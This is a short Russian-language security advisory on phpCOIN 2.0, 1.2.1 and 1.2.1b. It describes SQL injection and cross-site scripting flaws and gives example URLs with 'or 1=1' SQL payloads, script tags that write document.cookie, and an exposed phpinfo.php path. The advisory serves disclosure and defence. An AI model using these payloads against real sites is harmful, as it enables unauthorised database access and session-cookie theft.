Программа: phpCOIN 2.0, 1.2.1, 1.2.1b
Уязвимость позволяет удаленному пользователю произвести XSS атаку и выполнить произвольные SQL команды в целевой базе данных.
SQL-инъекция существует из-за некорректной обработки входных данных в некоторых сценариях. Удаленный пользователь может выполнить произвольные SQL команды на сервере.
Примеры:
http://[target]phpcoin/mod.php?mod=siteinfo&id=1'
http://[target]phpcoin/mod.php?mod=faq&mode= show&faq_id=2%20or%201=1
http://[target]phpc oin/mod.php?mod=pages&mode= view&id=25%20or%201=1
http://[target]phpcoin/mod.php?mod=siteinfo&id= 4%20or%201=1
Межсайтовый скриптинг возможен из-за некорректной обработки входных данных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы.
Примеры:
http://[target]phpcoin/mod.php?mod=helpdesk&mode=
new%22%3E%3Cscript%3Edocument.write(document.cooki e)%3C/script%3E
http://[target]phpcoin/mod.php?mod=mail&mode=reset &w=user%22%3E%3Cscript%3Edocument.write(document.cookie)
%3C/script%3E
http://[target]phpcoin/log in.php?w=user&o=login&e=
u%22%3E%3Cscript%3Edocument.write(document.cookie) %3C/script%3E
В конфигурации по умолчанию злоумышленник может получить доступ к системной информации на сервере.
Пример:
http://[target]/phpcoin_directory/phpinfo.php